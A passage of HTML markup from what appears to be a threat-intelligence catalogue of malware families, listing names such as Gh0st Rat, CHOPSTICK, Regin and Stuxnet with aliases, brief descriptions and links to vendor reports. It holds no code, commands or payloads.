</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2559. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/The-Desert-Falcons-targeted-attacks.pdf">https://securelist.com/files/2015/02/The-Desert-Falcons-targeted-attacks.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gh0st_rat_2"><a class="anchor" href="#_gh0st_rat_2"></a><a class="link" href="#_gh0st_rat_2">Gh0st Rat</a></h3>
<div class="paragraph">
<p>Gh0st Rat is a well-known Chinese remote access trojan which was originally made by C.Rufus Security Team several years ago.</p>
</div>
<div class="paragraph">
<p>Gh0st Rat is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gh0stRat, GhostRat</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2560. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf">http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fakem_rat_2"><a class="anchor" href="#_fakem_rat_2"></a><a class="link" href="#_fakem_rat_2">Fakem RAT</a></h3>
<div class="paragraph">
<p>Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).</p>
</div>
<div class="paragraph">
<p>Fakem RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FAKEM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2561. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mfc_huner"><a class="anchor" href="#_mfc_huner"></a><a class="link" href="#_mfc_huner">MFC Huner</a></h3>
<div class="paragraph">
<p>MFC Huner is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hupigon</p>
</li>
<li>
<p>BKDR_HUPIGON</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2562. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/japan-us-defense-industries-among-targeted-entities-in-latest-attack/">http://blog.trendmicro.com/trendlabs-security-intelligence/japan-us-defense-industries-among-targeted-entities-in-latest-attack/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackshades_2"><a class="anchor" href="#_blackshades_2"></a><a class="link" href="#_blackshades_2">Blackshades</a></h3>
<div class="paragraph">
<p>Blackshades Remote Access Tool targets Microsoft Windows operating systems. Authors were arrested in 2012 and 2014.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2563. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-and-fbi-assistant-director-charge-announce-charges-connection">https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-and-fbi-assistant-director-charge-announce-charges-connection</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.org/intelligence/2012/06/you-dirty-rat-part-2-blackshades-net/">https://blog.malwarebytes.org/intelligence/2012/06/you-dirty-rat-part-2-blackshades-net/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chopstick_2"><a class="anchor" href="#_chopstick_2"></a><a class="link" href="#_chopstick_2">CHOPSTICK</a></h3>
<div class="paragraph">
<p>backdoor used by apt28</p>
</div>
<div class="paragraph">
<p>CHOPSTICK is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>webhp</p>
</li>
<li>
<p>SPLM</p>
</li>
<li>
<p>(.v2 fysbis)</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2564. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_eviltoss"><a class="anchor" href="#_eviltoss"></a><a class="link" href="#_eviltoss">EVILTOSS</a></h3>
<div class="paragraph">
<p>backdoor used by apt28</p>
</div>
<div class="paragraph">
<p>Sedreco serves as a spying backdoor; its functionalities can be extended with dynamically loaded plugins. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component since April 2016.</p>
</div>
<div class="paragraph">
<p>EVILTOSS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sedreco</p>
</li>
<li>
<p>AZZY</p>
</li>
<li>
<p>ADVSTORESHELL</p>
</li>
<li>
<p>NETUI</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2565. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamefish"><a class="anchor" href="#_gamefish"></a><a class="link" href="#_gamefish">GAMEFISH</a></h3>
<div class="paragraph">
<p>backdoor</p>
</div>
<div class="paragraph">
<p>GAMEFISH is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sednit</p>
</li>
<li>
<p>Seduploader</p>
</li>
<li>
<p>JHUHUGIT</p>
</li>
<li>
<p>Sofacy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2566. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sourface"><a class="anchor" href="#_sourface"></a><a class="link" href="#_sourface">SOURFACE</a></h3>
<div class="paragraph">
<p>downloader - Older version of CORESHELL</p>
</div>
<div class="paragraph">
<p>SOURFACE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sofacy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2567. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oldbait_2"><a class="anchor" href="#_oldbait_2"></a><a class="link" href="#_oldbait_2">OLDBAIT</a></h3>
<div class="paragraph">
<p>credential harvester</p>
</div>
<div class="paragraph">
<p>OLDBAIT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sasfis</p>
</li>
<li>
<p>BackDoor-FDU</p>
</li>
<li>
<p>IEChecker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2568. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_sasfis.tl">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_sasfis.tl</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_coreshell_2"><a class="anchor" href="#_coreshell_2"></a><a class="link" href="#_coreshell_2">CORESHELL</a></h3>
<div class="paragraph">
<p>downloader - Newer version of SOURFACE</p>
</div>
<div class="paragraph">
<p>CORESHELL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sofacy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2569. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_havex_rat"><a class="anchor" href="#_havex_rat"></a><a class="link" href="#_havex_rat">Havex RAT</a></h3>
<div class="paragraph">
<p>Havex RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Havex</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_kjw0rm_2"><a class="anchor" href="#_kjw0rm_2"></a><a class="link" href="#_kjw0rm_2">KjW0rm</a></h3>
<div class="paragraph">
<p>RAT initially written in VB.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2570. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.sentinelone.com/blog/understanding-kjw0rm-malware-we-dive-in-to-the-tv5-cyber-attack/">https://www.sentinelone.com/blog/understanding-kjw0rm-malware-we-dive-in-to-the-tv5-cyber-attack/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinytyphon_2"><a class="anchor" href="#_tinytyphon_2"></a><a class="link" href="#_tinytyphon_2">TinyTyphon</a></h3>
</div>
<div class="sect2">
<h3 id="_badnews_2"><a class="anchor" href="#_badnews_2"></a><a class="link" href="#_badnews_2">Badnews</a></h3>
</div>
<div class="sect2">
<h3 id="_lurk"><a class="anchor" href="#_lurk"></a><a class="link" href="#_lurk">LURK</a></h3>
</div>
<div class="sect2">
<h3 id="_oldrea"><a class="anchor" href="#_oldrea"></a><a class="link" href="#_oldrea">Oldrea</a></h3>
</div>
<div class="sect2">
<h3 id="_ammyadmin"><a class="anchor" href="#_ammyadmin"></a><a class="link" href="#_ammyadmin">AmmyAdmin</a></h3>
</div>
<div class="sect2">
<h3 id="_matryoshka_2"><a class="anchor" href="#_matryoshka_2"></a><a class="link" href="#_matryoshka_2">Matryoshka</a></h3>
</div>
<div class="sect2">
<h3 id="_tinyzbot_2"><a class="anchor" href="#_tinyzbot_2"></a><a class="link" href="#_tinyzbot_2">TinyZBot</a></h3>
</div>
<div class="sect2">
<h3 id="_ghole"><a class="anchor" href="#_ghole"></a><a class="link" href="#_ghole">GHOLE</a></h3>
</div>
<div class="sect2">
<h3 id="_cwoolger"><a class="anchor" href="#_cwoolger"></a><a class="link" href="#_cwoolger">CWoolger</a></h3>
</div>
<div class="sect2">
<h3 id="_firemalv"><a class="anchor" href="#_firemalv"></a><a class="link" href="#_firemalv">FireMalv</a></h3>
</div>
<div class="sect2">
<h3 id="_regin_2"><a class="anchor" href="#_regin_2"></a><a class="link" href="#_regin_2">Regin</a></h3>
<div class="paragraph">
<p>Regin (also known as Prax or WarriorPride) is a sophisticated malware toolkit revealed by Kaspersky Lab, Symantec, and The Intercept in November 2014. The malware targets specific users of Microsoft Windows-based computers and has been linked to the US intelligence gathering agency NSA and its British counterpart, the GCHQ. The Intercept provided samples of Regin for download including malware discovered at Belgian telecommunications provider, Belgacom. Kaspersky Lab says it first became aware of Regin in spring 2012, but that some of the earliest samples date from 2003. The name Regin is first found on the VirusTotal website on 9 March 2011.</p>
</div>
<div class="paragraph">
<p>Regin is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Prax</p>
</li>
<li>
<p>WarriorPride</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2571. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Regin_(malware)">https://en.wikipedia.org/wiki/Regin_(malware)</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_duqu_2"><a class="anchor" href="#_duqu_2"></a><a class="link" href="#_duqu_2">Duqu</a></h3>
</div>
<div class="sect2">
<h3 id="_flame_2"><a class="anchor" href="#_flame_2"></a><a class="link" href="#_flame_2">Flame</a></h3>
</div>
<div class="sect2">
<h3 id="_stuxnet"><a class="anchor" href="#_stuxnet"></a><a class="link" href="#_stuxnet">Stuxnet</a></h3>
</div>
<div class="sect2">
<h3 id="_equationlaser"><a class="anchor" href="#_equationlaser"></a><a class="link" href="#_equationlaser">EquationLaser</a></h3>
</div>
<div class="sect2">
<h3 id="_equationdrug"><a class="anchor" href="#_equationdrug"></a><a class="link" href="#_equationdrug">EquationDrug</a></h3>
</div>
<div class="sect2">
<h3 id="_doublefantasy"><a class="anchor" href="#_doublefantasy"></a><a class="link" href="#_doublefantasy">DoubleFantasy</a></h3>
</div>
<div class="sect2">
<h3 id="_triplefantasy"><a class="anchor" href="#_triplefantasy"></a><a class="link" href="#_triplefantasy">TripleFantasy</a></h3>
</div>
<div class="sect2">
<h3 id="_fanny"><a class="anchor" href="#_fanny"></a><a class="link" href="#_fanny">Fanny</a></h3>
</div>
<div class="sect2">
<h3 id="_grayfish"><a class="anchor" href="#_grayfish"></a><a class="link" href="#_grayfish">GrayFish</a></h3>
</div>
<div class="sect2">
<h3 id="_babar"><a class="anchor" href="#_babar"></a><a class="link" href="#_babar">Babar</a></h3>
</div>
<div class="sect2">
<h3 id="_bunny"><a class="anchor" href="#_bunny"></a><a class="link" href="#_bunny">Bunny</a></h3>
</div>
<div class="sect2">
<h3 id="_casper"><a class="anchor" href="#_casper"></a><a class="link" href="#_casper">Casper</a></h3>
</div>
<div class="sect2">
<h3 id="_nbot"><a class="anchor" href="#_nbot"></a><a class="link" href="#_nbot">NBot</a></h3>
</div>
<div class="sect2">
<h3 id="_tafacalou"><a class="anchor" href="#_tafacalou"></a><a class="link" href="#_tafacalou">Tafacalou</a></h3>
</div>
<div class="sect2">
<h3 id="_tdrop"><a class="anchor" href="#_tdrop"></a><a class="link" href="#_tdrop">Tdrop</a></h3>
</div>
<div class="sect2">
<h3 id="_troy"><a class="anchor" href="#_troy"></a><a class="link" href="#_troy">Troy</a></h3>
</div>
<div class="sect2">
<h3 id="_tdrop2"><a class="anchor" href="#_tdrop2"></a><a class="link" href="#_tdrop2">Tdrop2</a></h3>
</div>
<div class="sect2">
<h3 id="_zxshell"><a class="anchor" href="#_zxshell"></a><a class="link" href="#_zxshell">ZXShell</a></h3>
<div class="paragraph">
<p>ZXShell is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sensode</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2572. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html">http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_t9000_2"><a class="anchor" href="#_t9000_2"></a><a class="link" href="#_t9000_2">T9000</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2573. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/">http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_t5000"><a class="anchor" href="#_t5000"></a><a class="link" href="#_t5000">T5000</a></h3>
<div class="paragraph">
<p>T5000 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Plat1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2574. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml">http://www.cylance.com/techblog/Grand-Theft-Auto-Panda.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taidoor_3"><a class="anchor" href="#_taidoor_3"></a><a class="link" href="#_taidoor_3">Taidoor</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2575. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/trojantaidoor-takes-aim-policy-think-tanks">http://www.symantec.com/connect/blogs/trojantaidoor-takes-aim-policy-think-tanks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_swisyn"><a class="anchor" href="#_swisyn"></a><a class="link" href="#_swisyn">Swisyn</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2576. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://labs.alienvault.com/labs/index.php/2013/latest-adobe-pdf-exploit-used-to-target-uyghur-and-tibetan-activists/">http://labs.alienvault.com/labs/index.php/2013/latest-adobe-pdf-exploit-used-to-target-uyghur-and-tibetan-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rekaf"><a class="anchor" href="#_rekaf"></a><a class="link" href="#_rekaf">Rekaf</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2577. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks">https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_scieron"><a class="anchor" href="#_scieron"></a><a class="link" href="#_scieron">Scieron</a></h3>
</div>
<div class="sect2">
<h3 id="_skeletonkey"><a class="anchor" href="#_skeletonkey"></a><a class="link" href="#_skeletonkey">SkeletonKey</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2578. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/">http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-malware-analysis/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_skyipot"><a class="anchor" href="#_skyipot"></a><a class="link" href="#_skyipot">Skyipot</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2579. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://labs.alienvault.com/labs/index.php/2011/another-sykipot-sample-likely-targeting-us-federal-agencies/">http://labs.alienvault.com/labs/index.php/2011/another-sykipot-sample-likely-targeting-us-federal-agencies/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spindest"><a class="anchor" href="#_spindest"></a><a class="link" href="#_spindest">Spindest</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2580. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.threatconnect.com/news/threatconnect-enables-healthy-networking-biomed-life-sciences-industry/">http://www.threatconnect.com/news/threatconnect-enables-healthy-networking-biomed-life-sciences-industry/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_preshin"><a class="anchor" href="#_preshin"></a><a class="link" href="#_preshin">Preshin</a></h3>
</div>
<div class="sect2">
<h3 id="_oficla"><a class="anchor" href="#_oficla"></a><a class="link" href="#_oficla">Oficla</a></h3>
</div>
<div class="sect2">
<h3 id="_pcclient_rat"><a class="anchor" href="#_pcclient_rat"></a><a class="link" href="#_pcclient_rat">PCClient RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2581. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2014/10/new-indicators-compromise-apt-group-nitro-uncovered/">http://researchcenter.paloaltonetworks.com/2014/10/new-indicators-compromise-apt-group-nitro-uncovered/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_plexor"><a class="anchor" href="#_plexor"></a><a class="link" href="#_plexor">Plexor</a></h3>
</div>
<div class="sect2">
<h3 id="_mongall"><a class="anchor" href="#_mongall"></a><a class="link" href="#_mongall">Mongall</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2582. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ned_worm"><a class="anchor" href="#_ned_worm"></a><a class="link" href="#_ned_worm">NeD Worm</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2583. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/dustysky/">http://www.clearskysec.com/dustysky/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_newct"><a class="anchor" href="#_newct"></a><a class="link" href="#_newct">NewCT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2584. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nflog"><a class="anchor" href="#_nflog"></a><a class="link" href="#_nflog">Nflog</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2585. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_janicab_2"><a class="anchor" href="#_janicab_2"></a><a class="link" href="#_janicab_2">Janicab</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2586. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/">http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jripbot"><a class="anchor" href="#_jripbot"></a><a class="link" href="#_jripbot">Jripbot</a></h3>
<div class="paragraph">
<p>Jripbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Jiripbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2587. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/butterfly-corporate-spies-out-for-financial-gain.pdf">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/butterfly-corporate-spies-out-for-financial-gain.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jolob"><a class="anchor" href="#_jolob"></a><a class="link" href="#_jolob">Jolob</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2588. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html">http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_isspace"><a class="anchor" href="#_isspace"></a><a class="link" href="#_isspace">IsSpace</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2589. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
